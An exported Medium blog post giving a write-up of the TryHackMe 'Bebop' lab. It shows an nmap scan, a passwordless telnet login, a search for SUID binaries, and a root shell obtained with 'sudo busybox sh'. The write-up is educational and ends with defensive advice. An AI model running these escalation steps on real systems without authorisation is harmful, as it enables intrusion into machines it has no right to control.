<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>TryHackMe writeup: Bebop</title><style>
      * {
        font-family: Georgia, Cambria, "Times New Roman", Times, serif;
      }
      html, body {
        margin: 0;
        padding: 0;
      }
      h1 {
        font-size: 50px;
        margin-bottom: 17px;
        color: #333;
      }
      h2 {
        font-size: 24px;
        line-height: 1.6;
        margin: 30px 0 0 0;
        margin-bottom: 18px;
        margin-top: 33px;
        color: #333;
      }
      h3 {
        font-size: 30px;
        margin: 10px 0 20px 0;
        color: #333;
      }
      header {
        width: 640px;
        margin: auto;
      }
      section {
        width: 640px;
        margin: auto;
      }
      section p {
        margin-bottom: 27px;
        font-size: 20px;
        line-height: 1.6;
        color: #333;
      }
      section img {
        max-width: 640px;
      }
      footer {
        padding: 0 20px;
        margin: 50px 0;
        text-align: center;
        font-size: 12px;
      }
      .aspectRatioPlaceholder {
        max-width: auto !important;
        max-height: auto !important;
      }
      .aspectRatioPlaceholder-fill {
        padding-bottom: 0 !important;
      }
      header,
      section[data-field=subtitle],
      section[data-field=description] {
        display: none;
      }
      </style></head><body><article class="h-entry">
<header>
<h1 class="p-name">TryHackMe writeup: Bebop</h1>
</header>
<section data-field="subtitle" class="p-summary">
This writeup discusses a TryHackMe room with a FreeBSD system that was inspired by hacking an annoying neighbour’s drone.
</section>
<section data-field="body" class="e-content">
<section name="4af1" class="section section--body section--first section--last"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><h3 name="ebd5" id="ebd5" class="graf graf--h3 graf--leading graf--title">TryHackMe writeup: Bebop</h3><p name="aa15" id="aa15" class="graf graf--p graf--startsWithDoubleQuote graf-after--h3"><a href="https://tryhackme.com/room/bebop" data-href="https://tryhackme.com/room/bebop" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“tryhackme” (2020)</a> published a room onto the TryHackMe platform that was inspired by a DEF CON presentation of a hacker discussing their experience hacking into their neighbour’s drone (<a href="https://youtu.be/5CzURm7OpAA" data-href="https://youtu.be/5CzURm7OpAA" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">DEFCONConference, 2015</a>). This room features a FreeBSD system with an insecure — by design — telnet service and a simple, yet clever nonetheless, method of privilege escalation. In this article, I will discuss my experience in working out the solution to this room.</p><figure name="d5de" id="d5de" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*fPLrruh2z9MlXqJo271-2g.png" data-width="658" data-height="659" data-is-featured="true" src="https://cdn-images-1.medium.com/max/800/1*fPLrruh2z9MlXqJo271-2g.png"><figcaption class="imageCaption">Base Image: <a href="https://www.ebay.com/p/3421927" data-href="https://www.ebay.com/p/3421927" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">eBay.com (n.d.)</a>.</figcaption></figure><h3 name="221b" id="221b" class="graf graf--h3 graf-after--figure">Procedure</h3><p name="bf09" id="bf09" class="graf graf--p graf-after--h3">Before I proceed to work out a solution to this room, I must first define the problem. In the case of this room, it is to work out the “user” flag and the “root” flag, with the former flag belonging to a normal system user and the latter belonging to a highly privileged user in the system.</p><p name="b005" id="b005" class="graf graf--p graf-after--p">This is a walkthrough room and one of the tasks (<a href="https://tryhackme.com/room/bebop" data-href="https://tryhackme.com/room/bebop" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“tryhackme”, 2019, task 3</a>) asks questions regarding the offensive security methods used to gain access to the system by unconventional means. The question battery can offer hints to the contender regarding what strategies to take when gaining access to the target system.</p><h4 name="cbbb" id="cbbb" class="graf graf--h4 graf-after--p">Recon</h4><p name="bc90" id="bc90" class="graf graf--p graf-after--h4">As usual with TryHackMe boot2root virtual machines, I clicked on the green-coloured button labeled “start machine” on the top-right corner of the first task. I gave the machine a few minutes to boot up and noticed that I have been assigned the codename <code class="markup--code markup--p-code">pilot</code> (<a href="https://tryhackme.com/room/bebop" data-href="https://tryhackme.com/room/bebop" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“tryhackme”, 2019, task 1</a>), which may show itself to be useful in gaining initial access to the system.</p><p name="3aa6" id="3aa6" class="graf graf--p graf-after--p">On my AttackBox, I proceeded to probe the target system’s running services with <a href="https://nmap.org/" data-href="https://nmap.org/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">nmap (n.d.)</a>:</p><pre name="015b" id="015b" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/bebop]<br>└─$ sudo nmap -sT -A -v -Pn -p- -O -sC -oX tcp_scan.xml &lt;target ip&gt;</strong><br>[sudo] password for dna: <strong class="markup--strong markup--pre-strong">*inputs password*</strong></pre><pre name="3dc7" id="3dc7" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="dcfe" id="dcfe" class="graf graf--pre graf-after--pre">Nmap scan report for &lt;target ip&gt;<br>Host is up (0.096s latency).<br>Not shown: 65533 closed tcp ports (conn-refused)<br>PORT STATE SERVICE VERSION<br>22/tcp open ssh OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)<br>| ssh-hostkey: <br>| 2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)<br>| 256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)<br>|_ 256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)<br>23/tcp open telnet BSD-derived telnetd<br>No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/).</pre><pre name="4081" id="4081" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="ea99" id="ea99" class="graf graf--pre graf-after--pre">Read data files from: /usr/bin/../share/nmap<br>OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/.<br>Nmap done: 1 IP address (1 host up) scanned in [redacted] seconds<br> Raw packets sent: 117 (8.958KB) | Rcvd: 101 (6.254KB)</pre><p name="145d" id="145d" class="graf graf--p graf-after--pre">I also took the liberty of using <code class="markup--code markup--p-code">xsltproc</code> to convert <code class="markup--code markup--p-code">nmap</code>’s XML output into a nice, readable HTML page:</p><pre name="b836" id="b836" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/bebop]<br>└─$ xsltproc tcp_scan.xml -o tcp_scan.html</strong><br> <br><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/bebop]<br>└─$ ls -l tcp_scan.html</strong><br>-rw-r--r--1 dna dna [redacted] [redacted] tcp_scan.html</pre><p name="0ef0" id="0ef0" class="graf graf--p graf-after--pre">Fig. 1 depicts an excerpt of <code class="markup--code markup--p-code">nmap</code>’s XML output:</p><figure name="4124" id="4124" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*Yt9nuzcFrRhvCOcRbhftYw.png" data-width="1003" data-height="678" src="https://cdn-images-1.medium.com/max/800/1*Yt9nuzcFrRhvCOcRbhftYw.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 1: Rendered XML output of Nmap probing of target machine.</strong></figcaption></figure><p name="f585" id="f585" class="graf graf--p graf-after--figure">The system is most likely running <a href="https://www.freebsd.org/" data-href="https://www.freebsd.org/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">FreeBSD (n.d.)</a> and is running two services: an SSH service on port 22 and a telnet service on port 23. This room’s “quiz” confirms that target machine is running FreeBSD and that the vulnerable service to be exploited is telnet.</p><h4 name="222c" id="222c" class="graf graf--h4 graf-after--p">Initial access</h4><p name="0a10" id="0a10" class="graf graf--p graf-after--h4">I proceeded to telnet into port 23 of the target machine and was greeted with a login prompt:</p><pre name="4ce7" id="4ce7" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/bebop]<br>└─$ telnet &lt;target ip&gt; 23</strong><br>Trying &lt;target ip&gt;...<br>Connected to &lt;target ip&gt;.<br>Escape character is &#39;^]&#39;.<br>login:</pre><p name="af2e" id="af2e" class="graf graf--p graf-after--pre">I recalled from the first task that I was assigned the “codename” <code class="markup--code markup--p-code">pilot</code>, so I tried that in the login, and……….</p><pre name="1325" id="1325" class="graf graf--pre graf-after--p">login: <strong class="markup--strong markup--pre-strong">[pilot]</strong><br>Last login: [redacted] from [redacted]<br>FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr 4 02:07:22 UTC 2019</pre><pre name="c48d" id="c48d" class="graf graf--pre graf-after--pre">Welcome to FreeBSD!</pre><pre name="fa03" id="fa03" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="9a8b" id="9a8b" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">[pilot@freebsd ~]$</strong></pre><p name="8c37" id="8c37" class="graf graf--p graf-after--pre">The initial access technique was rather simple. I can now begin to further probe the target system and solve the problem at hand.</p><h4 name="8fd5" id="8fd5" class="graf graf--h4 graf-after--p">Post exploitation</h4><p name="b598" id="b598" class="graf graf--p graf-after--h4">I can start with some rudimentary stuff. The first thing that I will do is attempt to get the user flag:</p><pre name="7c5d" id="7c5d" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">[pilot@freebsd ~]$ ls</strong><br>user.txt<br><strong class="markup--strong markup--pre-strong">[pilot@freebsd ~]$ cat user.txt</strong><br>[redacted]</pre><p name="b6e3" id="b6e3" class="graf graf--p graf-after--pre">Wonderful. I can now with the second task at hand: work out a solution to gain access to the infamous <code class="markup--code markup--p-code">root</code> account. The “quiz” task of this room asks the question: “what binary was used to escalate privillages [sic]?” I hypothesised that the a privilege escalation can be done through a binary with the <code class="markup--code markup--p-code">SUID</code> bit set. To do so, I ran the <code class="markup--code markup--p-code">find</code> command to get a list of binaries with the <code class="markup--code markup--p-code">SUID</code> bit set:</p><pre name="e112" id="e112" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">[pilot@freebsd ~]$ find / -type f -perm -4000 -print 2&gt;/dev/null</strong><br>/bin/rcp<br>/sbin/mksnap_ffs<br>/sbin/ping<br>/sbin/shutdown<br>/sbin/poweroff<br>/sbin/ping6<br>/usr/bin/chpass<br>/usr/bin/lock<br>/usr/bin/login<br>/usr/bin/opieinfo<br>/usr/bin/opiepasswd<br>/usr/bin/passwd<br>/usr/bin/su<br>/usr/bin/at<br>/usr/bin/atq<br>/usr/bin/atrm<br>/usr/bin/batch<br>/usr/bin/quota<br>/usr/bin/rlogin<br>/usr/bin/rsh<br>/usr/bin/crontab<br>/usr/bin/lpq<br>/usr/bin/lpr<br>/usr/bin/lprm<br>/usr/libexec/dma-mbox-create<br>/usr/libexec/ulog-helper<br>/usr/libexec/ssh-keysign<br>/usr/local/bin/sudo<br>/usr/sbin/traceroute<br>/usr/sbin/authpf<br>/usr/sbin/authpf-noip<br>/usr/sbin/traceroute6<br>/usr/sbin/ppp<br>/usr/sbin/timedc<br><strong class="markup--strong markup--pre-strong">[pilot@freebsd ~]$</strong></pre><p name="817b" id="817b" class="graf graf--p graf-after--pre">To work out which system utilities can be exploited to get root and how to go about exploiting them, I will compare the output from the above terminal to the <a href="https://gtfobins.github.io/" data-href="https://gtfobins.github.io/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">GTFOBins (n.d.-a)</a> reference. Unfortunately, from what I can tell, the only binary that seems remotely* exploitable in regards to getting into the root account is <code class="markup--code markup--p-code">crontab</code> (<a href="https://gtfobins.github.io/gtfobins/crontab/" data-href="https://gtfobins.github.io/gtfobins/crontab/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">GTFOBins, n.d.-b</a>), and it is not done through the <code class="markup--code markup--p-code">SUID</code> bit, but rather through the <code class="markup--code markup--p-code">sudo</code> utility.</p><p name="caf9" id="caf9" class="graf graf--p graf-after--p">*No pun intended 😋</p><p name="efe1" id="efe1" class="graf graf--p graf-after--p">Since I am not too familiar with FreeBSD (and privilege escalation in general), I decided to rely on the works of other hackers who completed this room. <a href="https://muirlandoracle.co.uk/2020/01/13/bebop-write-up/" data-href="https://muirlandoracle.co.uk/2020/01/13/bebop-write-up/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“MuirlandOracle” (2020)</a> described the procedure that they implemented for privilege escalation:</p><blockquote name="0d6b" id="0d6b" class="graf graf--blockquote graf--startsWithDoubleQuote graf-after--p">“First, run <code class="markup--code markup--blockquote-code">sudo -l</code> to work out what binaries can be ran as root. In this machine, the <a href="https://busybox.net/" data-href="https://busybox.net/" class="markup--anchor markup--blockquote-anchor" rel="noopener" target="_blank">busybox (n.d.)</a> utility can be ran as root. BusyBox is a utility that implements an amalgamation of different Unix-based utilities into a single executable. It can be exploited to run<code class="markup--code markup--blockquote-code"> /bin/sh</code> to get a root shell.” — Paraphrase of <a href="https://muirlandoracle.co.uk/2020/01/13/bebop-write-up/" data-href="https://muirlandoracle.co.uk/2020/01/13/bebop-write-up/" class="markup--anchor markup--blockquote-anchor" rel="noopener" target="_blank">“MuirlandOracle” (2020)</a>.</blockquote><p name="eaa1" id="eaa1" class="graf graf--p graf-after--blockquote">I more or less did what MurilandOracle did. On the target system shell that I got, I executed the following commands:</p><pre name="b5fb" id="b5fb" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">[pilot@freebsd ~]$ sudo -l</strong><br>User pilot may run the following commands on freebsd:<br> (root) NOPASSWD: /usr/local/bin/busybox<br><strong class="markup--strong markup--pre-strong">[pilot@freebsd ~]$ sudo /usr/local/bin/busybox sh</strong><br><strong class="markup--strong markup--pre-strong"># id</strong><br>uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)<br><strong class="markup--strong markup--pre-strong"># cat /root/root.txt</strong><br>[redacted]</pre><p name="8a13" id="8a13" class="graf graf--p graf-after--pre">Allora.</p><h3 name="28f3" id="28f3" class="graf graf--h3 graf-after--p">Summary</h3><p name="a77d" id="a77d" class="graf graf--p graf-after--h3">This was rather short writeup for a room that was simple, yet cleverly made. The exploitation part was rather easy: <code class="markup--code markup--p-code">telnet</code> is by no means a secure system, and the more secure SSH service should be used in place of it.</p><p name="c91b" id="c91b" class="graf graf--p graf-after--p">Furthermore, there are not much difference between Linux and FreeBSD based systems.* The very same <code class="markup--code markup--p-code">sudo -l</code> technique that can be used to gain root access to a Linux system can also be used on FreeBSD systems (I just did not think to use <code class="markup--code markup--p-code">sudo -l</code> lol).</p><p name="8d3b" id="8d3b" class="graf graf--p graf-after--p">*For a funny story regarding the apparent differences between Linux and FreeBSD, see <a href="https://attrition.org/errata/charlatan/se7en/se7en.018.html" data-href="https://attrition.org/errata/charlatan/se7en/se7en.018.html" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Attrition.org (1998)</a>.</p><h4 name="71ce" id="71ce" class="graf graf--h4 graf-after--p">Takeaways</h4><ul class="postList"><li name="c866" id="c866" class="graf graf--li graf-after--h4">The same techniques that can be used to root a Linux system are similar (and even identical in some cases) to the techniques used to root any other kind of <em class="markup--em markup--li-em">Unix</em> system.</li><li name="9ebe" id="9ebe" class="graf graf--li graf-after--li"><code class="markup--code markup--li-code">sudo -l</code> should be used as frequently as <code class="markup--code markup--li-code">find / -perm -4000</code> when hunting for binaries to get root.</li><li name="e40f" id="e40f" class="graf graf--li graf-after--li">For the love of God, <strong class="markup--strong markup--li-strong">do not</strong> use <code class="markup--code markup--li-code">telnet</code> on a production system. It can only lead to trouble with hackers on steroids 😬</li></ul><h4 name="48eb" id="48eb" class="graf graf--h4 graf-after--li">Plug</h4><p name="5c28" id="5c28" class="graf graf--p graf-after--h4">Check out my friend Mira Lazine who, along with other associates, needs financial and emotional help. Check out the following links:</p><ul class="postList"><li name="f645" id="f645" class="graf graf--li graf-after--p">Her Twitter profile: <a href="https://twitter.com/MiraLazine" data-href="https://twitter.com/MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener ugc nofollow noopener" target="_blank">https://twitter.com/MiraLazine</a></li><li name="6327" id="6327" class="graf graf--li graf-after--li">Her Medium profile: <a href="https://medium.com/@MiraLazine" data-href="https://medium.com/@MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener" target="_blank">https://medium.com/@MiraLazine</a></li><li name="79b5" id="79b5" class="graf graf--li graf-after--li">Donate to herself on Cash.App: <a href="https://cash.app/$MiraLazine" data-href="https://cash.app/$MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener ugc nofollow noopener" target="_blank">https://cash.app/$MiraLazine</a></li></ul><h3 name="2baf" id="2baf" class="graf graf--h3 graf-after--li">References</h3><p name="142c" id="142c" class="graf graf--p graf-after--h3">Attrition.org (1998). <em class="markup--em markup--p-em">se7en’s elite unix skills</em>. Retrieved on Apr. 16, 2022 from: <a href="https://attrition.org/errata/charlatan/se7en/se7en.018.html" data-href="https://attrition.org/errata/charlatan/se7en/se7en.018.html" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://attrition.org/errata/charlatan/se7en/se7en.018.html</a></p><p name="9a81" id="9a81" class="graf graf--p graf-after--p">busybox (n.d.). Retrieved on Apr. 16, 2022 from: <a href="https://busybox.net/" data-href="https://busybox.net/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://busybox.net/</a></p><p name="12fc" id="12fc" class="graf graf--p graf-after--p">DEFCONConference (2015). <em class="markup--em markup--p-em">DEF CON 23 - Robinson and Mitchell - Knocking my neighbors kids cruddy drone offline</em>. YouTube. Retrieved on Apr. 16, 2022 from: <a href="https://youtu.be/5CzURm7OpAA" data-href="https://youtu.be/5CzURm7OpAA" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://youtu.be/5CzURm7OpAA</a></p><p name="2f1e" id="2f1e" class="graf graf--p graf-after--p">eBay.com (n.d.). <em class="markup--em markup--p-em">Sol Bianca: The Legacy Box Set (DVD, 2003, 3-Disc Set)</em>. Retrieved on Apr. 16, 2022 from: <a href="https://www.ebay.com/p/3421927" data-href="https://www.ebay.com/p/3421927" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.ebay.com/p/3421927</a></p><p name="1b74" id="1b74" class="graf graf--p graf-after--p">FreeBSD (n.d.). <em class="markup--em markup--p-em">The FreeBSD Project</em>. Retrieved on Apr. 16, 2022 from: <a href="https://www.freebsd.org/" data-href="https://www.freebsd.org/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.freebsd.org/</a></p><p name="645e" id="645e" class="graf graf--p graf-after--p">GTFOBins (n.d.-a). <em class="markup--em markup--p-em">GTFOBins Home Page</em>. Retrieved on Apr. 16, 2022 from: <a href="https://gtfobins.github.io/" data-href="https://gtfobins.github.io/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://gtfobins.github.io/</a></p><p name="6e91" id="6e91" class="graf graf--p graf-after--p">GTFOBins (n.d.-b). crontab. Retrieved on Apr. 16, 2022 from: <a href="https://gtfobins.github.io/gtfobins/crontab/" data-href="https://gtfobins.github.io/gtfobins/crontab/" class="markup--anchor markup--p-anchor" rel="nofollow noopener noopener" target="_blank">https://gtfobins.github.io/gtfobins/crontab/</a></p><p name="177b" id="177b" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“MuirlandOracle” (2020). <em class="markup--em markup--p-em">Bebop — Write-up</em>. Retrieved on Apr. 16, 2022 from: <a href="https://muirlandoracle.co.uk/2020/01/13/bebop-write-up/" data-href="https://muirlandoracle.co.uk/2020/01/13/bebop-write-up/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">https://muirlandoracle.co.uk/2020/01/13/bebop-write-up/</a></p><p name="6a47" id="6a47" class="graf graf--p graf-after--p">nmap (n.d.). <em class="markup--em markup--p-em">Nmap: the Network Mapper - Free Security Scanner</em>. Retrieved on Apr. 16, 2022: <a href="https://nmap.org/" data-href="https://nmap.org/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://nmap.org/</a></p><p name="de37" id="de37" class="graf graf--p graf--startsWithDoubleQuote graf-after--p graf--trailing">“tryhackme” (2019). <em class="markup--em markup--p-em">Bebop</em>. TryHackMe. Retrieved on Apr. 16, 2022 from: <a href="https://tryhackme.com/room/bebop" data-href="https://tryhackme.com/room/bebop" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://tryhackme.com/room/bebop</a></p></div></div></section>
</section>
<footer><p>By <a href="https://medium.com/@EpsilonCalculus" class="p-author h-card">Aleksey</a> on <a href="https://medium.com/p/ed290135d7e2"><time class="dt-published" datetime="2022-04-17T21:37:17.294Z">April 17, 2022</time></a>.</p><p><a href="https://medium.com/@EpsilonCalculus/tryhackme-writeup-bebop-ed290135d7e2" class="p-canonical">Canonical link</a></p><p>Exported from <a href="https://medium.com">Medium</a> on June 14, 2022.</p></footer></article></body></html>